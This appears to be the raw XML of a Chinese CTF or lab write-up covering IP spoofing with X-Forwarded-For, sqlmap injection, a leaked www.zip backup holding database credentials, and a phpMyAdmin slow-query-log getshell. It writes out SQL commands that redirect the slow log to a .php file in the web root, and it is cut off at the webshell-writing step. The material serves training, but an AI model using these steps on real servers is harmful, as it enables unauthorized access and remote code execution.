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D6529" w14:textId="54042CE5" w:rsidR="008C4056" w:rsidRDefault="008C4056"/>
    <w:p w14:paraId="1C6908AE" w14:textId="5AE7F47E" w:rsidR="00917922" w:rsidRDefault="00191A41" w:rsidP="00917922">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00917922">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、解题步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0D0DC5" w14:textId="02E8FD95" w:rsidR="00B839A1" w:rsidRPr="00C30103" w:rsidRDefault="003B4861" w:rsidP="00AA4BB4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鼠标悬停到中间方块，提示进入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633683DA" w14:textId="1EF18E01" w:rsidR="00917922" w:rsidRDefault="003B4861">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33E184D2" wp14:editId="17DDEBA7">
            <wp:extent cx="5274310" cy="2777490"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="2065688559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88559" name="图片 1" descr="图片包含 图形用户界面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961C" w14:textId="65E4445A" w:rsidR="003B4861" w:rsidRDefault="003B4861">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击后提示</w:t>
      </w:r>
      <w:r w:rsidR="00E50DB1" w:rsidRPr="00E50DB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你的</w:t>
      </w:r>
      <w:r w:rsidR="00E50DB1" w:rsidRPr="00E50DB1">
        <w:t>IP地址不正确</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD5D4C4" w14:textId="5109A5EF" w:rsidR="00A53C41" w:rsidRDefault="00E50DB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A2F9118" wp14:editId="66AB15E4">
            <wp:extent cx="5274310" cy="2762885"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14493502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5027" name="图片 1" descr="图形用户界面,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DB86" w14:textId="4100977E" w:rsidR="00FA49AC" w:rsidRDefault="00FA49AC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59DD31E3" w14:textId="3ED20D08" w:rsidR="00BC3B64" w:rsidRDefault="000704DE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里是</w:t>
      </w:r>
      <w:r w:rsidRPr="00E50DB1">
        <w:t>IP伪造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，直接使用</w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>odHead</w:t>
      </w:r>
      <w:r w:rsidR="00EF6871">
        <w:t>er</w:t>
      </w:r>
      <w:r w:rsidR="00EF6871">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件加入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E50DB1" w:rsidRPr="00E50DB1">
        <w:t>X-Forwarded-For</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5D9B69" w14:textId="4BA9360E" w:rsidR="00EF6871" w:rsidRDefault="00EF6871">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="358B8A68" wp14:editId="2093AB00">
            <wp:extent cx="5274310" cy="1423035"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1670156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5698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34D8" w14:textId="0AEADC23" w:rsidR="00AF38CD" w:rsidRDefault="00AF38CD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再次点击可成功进入主页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3529D18B" w14:textId="45AEC16D" w:rsidR="00AF38CD" w:rsidRDefault="003A7296">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C3F502F" wp14:editId="3748C9D5">
            <wp:extent cx="5274310" cy="2755900"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="2128931218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31218" name="图片 1" descr="图形用户界面, 网站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A4EB" w14:textId="7FEBEE97" w:rsidR="00F35E8C" w:rsidRDefault="00F35E8C" w:rsidP="00876CB3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Flag1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F279476" w14:textId="29A9058D" w:rsidR="003A7296" w:rsidRDefault="003A7296">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随便点击</w:t>
      </w:r>
      <w:r w:rsidR="00831CE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址栏参数id值会发生变化，直接使用sqlma</w:t>
      </w:r>
      <w:r w:rsidR="00831CE1">
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00831CE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C158092" w14:textId="68FD70FD" w:rsidR="00831CE1" w:rsidRDefault="00831CE1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DE48B46" wp14:editId="5446C8D7">
            <wp:extent cx="5274310" cy="2771775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="33913940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39406" name="图片 1" descr="图形用户界面, 应用程序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2F94" w14:textId="633CDC4B" w:rsidR="00E47F63" w:rsidRDefault="003C37ED">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30DC22C8" wp14:editId="56CB0066">
            <wp:extent cx="5274310" cy="2986405"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="134608930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89302" name="图片 1" descr="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BF03" w14:textId="7D37B3D7" w:rsidR="003C37ED" w:rsidRDefault="003C37ED">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存咋sql注入，注数据库，注表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2B8646" w14:textId="2B587598" w:rsidR="003C37ED" w:rsidRDefault="00CB7D0A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BA40A3A" wp14:editId="442E3964">
            <wp:extent cx="5274310" cy="1788795"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="13914595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59500" name="图片 1" descr="文本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6C4D" w14:textId="4961B374" w:rsidR="00CB7D0A" w:rsidRDefault="00CB7D0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现有个down</w:t>
      </w:r>
      <w:r>
        <w:t>_flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表，直接dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CD69A1" w14:textId="4326E22C" w:rsidR="00CB7D0A" w:rsidRDefault="00CB7D0A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45BF9111" wp14:editId="24884448">
            <wp:extent cx="5274310" cy="2259330"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="194334034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40341" name="图片 1" descr="文本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7BAE" w14:textId="0EC1AC41" w:rsidR="008A7B5C" w:rsidRDefault="008A7B5C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36F9EBE4" wp14:editId="7190CA5C">
            <wp:extent cx="5274310" cy="2918460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="12445380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3807" name="图片 1" descr="文本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CB8E" w14:textId="7C36F12A" w:rsidR="008A7B5C" w:rsidRDefault="008A7B5C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制解码得flag</w:t>
      </w:r>
      <w:r w:rsidR="00B85719">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F35E8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00F35E8C" w:rsidRPr="00F35E8C">
        <w:t>flag{28359jkfdsjf03jfkds9}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475A691F" w14:textId="7849EDCD" w:rsidR="00B85719" w:rsidRDefault="00F35E8C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4734C6A9" wp14:editId="72F2BE81">
            <wp:extent cx="5274310" cy="2762885"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="54194187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41878" name="图片 1" descr="图形用户界面, 应用程序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DCF0" w14:textId="77777777" w:rsidR="008A7B5C" w:rsidRDefault="008A7B5C"/>
    <w:p w14:paraId="3E8AF04D" w14:textId="5FC9CD80" w:rsidR="00876CB3" w:rsidRDefault="00876CB3" w:rsidP="00876CB3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Flag2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0890C47F" w14:textId="38326500" w:rsidR="00DF0538" w:rsidRDefault="00DF0538">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dirmap进行</w:t>
      </w:r>
      <w:r w:rsidR="002643F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录</w:t>
      </w:r>
      <w:r w:rsidR="002643F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,存在可疑路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255C88EC" w14:textId="47A49C11" w:rsidR="00DF0538" w:rsidRDefault="002643F3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="110414FA" wp14:editId="52196DD8">
            <wp:extent cx="5274310" cy="2861310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="201572216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22164" name="图片 1" descr="文本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EB86" w14:textId="5ED948B3" w:rsidR="002643F3" w:rsidRDefault="002643F3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidRPr="002643F3">
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="00FD0FB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>your</w:t>
      </w:r>
      <w:r w:rsidR="00FD0FB5">
        <w:t>-ip:port</w:t>
      </w:r>
      <w:r w:rsidR="00FD0FB5" w:rsidRPr="002643F3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002643F3">
        <w:t>/www.zip</w:t>
      </w:r>
      <w:r w:rsidR="00F32505">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可下载</w:t>
      </w:r>
      <w:r w:rsidR="00F32505" w:rsidRPr="002643F3">
        <w:t>www.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10558EF9" w14:textId="6C5EC6D8" w:rsidR="00650657" w:rsidRDefault="00F32505">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AFF3DC4" wp14:editId="106E9D37">
            <wp:extent cx="5274310" cy="2090420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="641706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0681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B8F9" w14:textId="3D52D41C" w:rsidR="00421101" w:rsidRDefault="00421101">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解压</w:t>
      </w:r>
      <w:r w:rsidR="006C5F75">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后里面还有压缩文件，继续解压</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F70C1D2" w14:textId="6CE21E9E" w:rsidR="006C5F75" w:rsidRDefault="006C5F75">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39BD9254" wp14:editId="5BF8514A">
            <wp:extent cx="5257800" cy="1438275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="69765102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51028" name="图片 1" descr="图形用户界面, 文本, 应用程序, 电子邮件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24FD" w14:textId="4B5EA35F" w:rsidR="000E1C8A" w:rsidRDefault="000E1C8A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要解压密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208436C2" w14:textId="6A1F1318" w:rsidR="000E1C8A" w:rsidRDefault="000E1C8A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="452C6279" wp14:editId="50840413">
            <wp:extent cx="5274310" cy="2731135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="92556209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62099" name="图片 1" descr="图形用户界面, 应用程序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FEC5" w14:textId="603E4CFD" w:rsidR="000E1C8A" w:rsidRDefault="000E1C8A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将文件名MD5解密可得密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F6B5E5" w14:textId="61E32A0B" w:rsidR="000E1C8A" w:rsidRDefault="00F80BB2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62D0D5EA" wp14:editId="0E602636">
            <wp:extent cx="5274310" cy="1728470"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1422560694" name="图片 1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60694" name="图片 1" descr="图形用户界面, 应用程序, 网站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B6DB" w14:textId="57BCCFC0" w:rsidR="00F80BB2" w:rsidRDefault="00274C7B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解压后的文件，第一个配置文件，第二个日志文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151BF771" w14:textId="2DBDC1E7" w:rsidR="00274C7B" w:rsidRDefault="00274C7B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63C4773C" wp14:editId="679DB05E">
            <wp:extent cx="5274310" cy="1219835"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="418692227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92227" name="图片 1" descr="图形用户界面, 文本, 应用程序, Word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B716" w14:textId="0DC35188" w:rsidR="007D2D22" w:rsidRDefault="007D2D22">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一个配置文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中包含数据库</w:t>
      </w:r>
      <w:r w:rsidR="00A329D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名和密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D47B1C3" w14:textId="53520FE0" w:rsidR="007D2D22" w:rsidRDefault="00A329D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E37EF3A" wp14:editId="180B8A3F">
            <wp:extent cx="5274310" cy="2824480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="960940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4047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8B03" w14:textId="136BF368" w:rsidR="00E11833" w:rsidRDefault="00E11833">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二个日志文件</w:t>
      </w:r>
      <w:r w:rsidR="00EB216D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中搜索flag，可获得f</w:t>
      </w:r>
      <w:r w:rsidR="00EB216D">
        <w:t>lag2</w:t>
      </w:r>
      <w:r w:rsidR="00713433">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00713433" w:rsidRPr="00713433">
        <w:t>FLAG{fjdse850439jlkufg}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43633E3B" w14:textId="43910042" w:rsidR="00EB216D" w:rsidRDefault="00713433">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CC3CF80" wp14:editId="2F6596DB">
            <wp:extent cx="5274310" cy="1864995"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="88593292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32924" name="图片 1" descr="图形用户界面, 文本, 应用程序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1035" w14:textId="77777777" w:rsidR="001810AA" w:rsidRDefault="001810AA"/>
    <w:p w14:paraId="1675E1BE" w14:textId="6A31CB1F" w:rsidR="001810AA" w:rsidRDefault="001810AA" w:rsidP="001810AA">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Flag3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D84AA0" w14:textId="4E24677F" w:rsidR="001810AA" w:rsidRDefault="001810AA" w:rsidP="001810AA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录扫描结果</w:t>
      </w:r>
      <w:r w:rsidR="00846EAD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r w:rsidR="00846EAD">
        <w:t>myadmin</w:t>
      </w:r>
      <w:r w:rsidR="00846EAD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录和获得的数据库用户名</w:t>
      </w:r>
      <w:r w:rsidR="0085733D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00846EAD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码登录数据库管理页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788BF7D7" w14:textId="38E902A4" w:rsidR="00DC6799" w:rsidRDefault="00DC6799" w:rsidP="001810AA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E1720AC" wp14:editId="226D23C2">
            <wp:extent cx="5274310" cy="2771140"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2091059404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59404" name="图片 1" descr="图形用户界面, 应用程序, Word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DB36" w14:textId="36FBE027" w:rsidR="00E211AD" w:rsidRDefault="00E211AD" w:rsidP="001810AA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77D2FEF9" wp14:editId="6B0CEAD4">
            <wp:extent cx="5274310" cy="2771140"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="731180802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80802" name="图片 1" descr="图形用户界面, 应用程序, Word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043A" w14:textId="124D2C43" w:rsidR="00E211AD" w:rsidRDefault="00F35F7F" w:rsidP="001810AA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这儿也可以找到之前s</w:t>
      </w:r>
      <w:r>
        <w:t>ql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入的flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BDD401" w14:textId="3E8DB8B7" w:rsidR="00F35F7F" w:rsidRDefault="00F35F7F" w:rsidP="001810AA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DF425BC" wp14:editId="3D4CA0BB">
            <wp:extent cx="5274310" cy="2762250"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="197686720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67205" name="图片 1" descr="图形用户界面, 应用程序&#10;&#10;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996F" w14:textId="77777777" w:rsidR="00F35F7F" w:rsidRDefault="00F35F7F" w:rsidP="001810AA"/>
    <w:p w14:paraId="72C75A7B" w14:textId="31EAEFFD" w:rsidR="00F35F7F" w:rsidRDefault="00F35F7F" w:rsidP="001810AA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>慢</w:t>
      </w:r>
      <w:r w:rsidR="005711C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0749B2" w14:textId="57D63C28" w:rsidR="005A2694" w:rsidRDefault="005A2694" w:rsidP="005A2694">
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>. 查询slow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2F6BB0" w14:textId="0BA2EA9D" w:rsidR="005A2694" w:rsidRDefault="005A2694" w:rsidP="005A2694">
      <w:r>
        <w:t>show global variables like '%slow%'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6A2CFD" w14:textId="2E404C04" w:rsidR="00F35F7F" w:rsidRDefault="00BC0266" w:rsidP="001810AA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73B0EFD2" wp14:editId="33FCCC46">
            <wp:extent cx="5274310" cy="2106930"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="1834077060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77060" name="图片 1" descr="图形用户界面, 应用程序, Word&#10;&#10;描述已自动生成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2CC4" w14:textId="24E04707" w:rsidR="005A2694" w:rsidRDefault="005A2694" w:rsidP="005A2694">
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>. 开启慢查询日志功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F230C6" w14:textId="77777777" w:rsidR="005A2694" w:rsidRDefault="005A2694" w:rsidP="005A2694">
      <w:r>
        <w:t>set global slow_query_log=on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D844BA" w14:textId="5DDABE43" w:rsidR="00147123" w:rsidRDefault="00147123" w:rsidP="005A2694">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BC20BC0" wp14:editId="052C39A5">
            <wp:extent cx="5274310" cy="2045970"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="77306107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61072" name="图片 1" descr="图形用户界面, 文本, 应用程序, 电子邮件&#10;&#10;描述已自动生成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E00B" w14:textId="77777777" w:rsidR="005A2694" w:rsidRDefault="005A2694" w:rsidP="005A2694">
      <w:r>
        <w:t>show global variables like '%slow%'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0157ADF4" w14:textId="10B47EEE" w:rsidR="00147123" w:rsidRDefault="00147123" w:rsidP="005A2694">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77761CE4" wp14:editId="7B732AE0">
            <wp:extent cx="5274310" cy="2431415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="27007554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75543" name="图片 1" descr="图形用户界面, 文本, 应用程序, 电子邮件&#10;&#10;描述已自动生成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BDBE" w14:textId="7D877408" w:rsidR="005A2694" w:rsidRDefault="005A2694" w:rsidP="005A2694">
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>. 重新设置慢日志路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416C0142" w14:textId="4859B744" w:rsidR="005A2694" w:rsidRDefault="005A2694" w:rsidP="005A2694">
      <w:r>
        <w:t>set global slow_query_log_file='D:/phpstudy_pro/WWW/</w:t>
      </w:r>
      <w:r w:rsidR="00305819">
        <w:t>you-ip</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00305819">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:t>.php'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E11328" w14:textId="2F7D0289" w:rsidR="00305819" w:rsidRDefault="00305819" w:rsidP="005A2694">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69D70F51" wp14:editId="347C1402">
            <wp:extent cx="5274310" cy="2383155"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1441452947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52947" name="图片 1" descr="图形用户界面, 文本, 应用程序, 电子邮件&#10;&#10;描述已自动生成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15A5" w14:textId="73C6A20D" w:rsidR="005A2694" w:rsidRDefault="005A2694" w:rsidP="005A2694">
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>. 执行sql命令，写webshell</w:t>
      </w:r>
      <w:r w:rsidR="00305819">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
